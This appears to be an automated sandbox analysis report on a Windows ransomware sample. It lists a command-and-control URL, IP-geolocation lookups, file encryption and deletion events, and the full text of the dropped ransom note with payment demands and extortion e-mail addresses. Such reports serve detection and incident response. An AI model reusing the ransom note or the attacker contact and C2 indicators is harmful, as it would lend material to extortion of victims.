              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385543393.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.phpp
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1676063255.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000849000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/8
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/M
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/MW
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/cWc
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: https://api.2ip.ua/geo.json
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json2
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json2X
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json8
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.0000000000886000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json8.
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000849000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonE
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonP
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonR
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840014089.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonT
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonX
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840014089.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1676063255.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/o
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/s
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
              Source: 30264859306.ttf.2.dr, 37262344671.ttf.2.drString found in binary or memory: https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962329518.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385857595.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-eyUsqpKb
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-eyUsqpKb0so
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.000000000139A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-eyUsqpKbFl
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385857595.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-eyUsqpKbt
              Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004E22E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,0_2_004E22E0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\_readme.txt Dropped file: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-eyUsqpKbFl Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0816JOsiephJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7620, type: MEMORYSTR
              Source: Yara matchFile source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLE
              Source: Yara matchFile source: 3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7620, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7708, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7868, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPED
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File moved: C:\Users\user\Desktop\WKXEWIOTXI.png
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File deleted: C:\Users\user\Desktop\WKXEWIOTXI.png
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File moved: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File deleted: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe File moved: C:\Users\user\Desktop\NWTVCDUMOB.pdf
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-eyusqpkbflprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0816josiephjtdho970vyx7vwlyg00oakdr75rujz7nxdart1Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99312633191Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99617796879Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99533573246Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99172098852Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99734304608Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99658111469Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma entropy: 7.99074000166Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99049189549Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99829521335Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99834687895Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99844103916Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99838096058Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99829234846Jump to dropped file
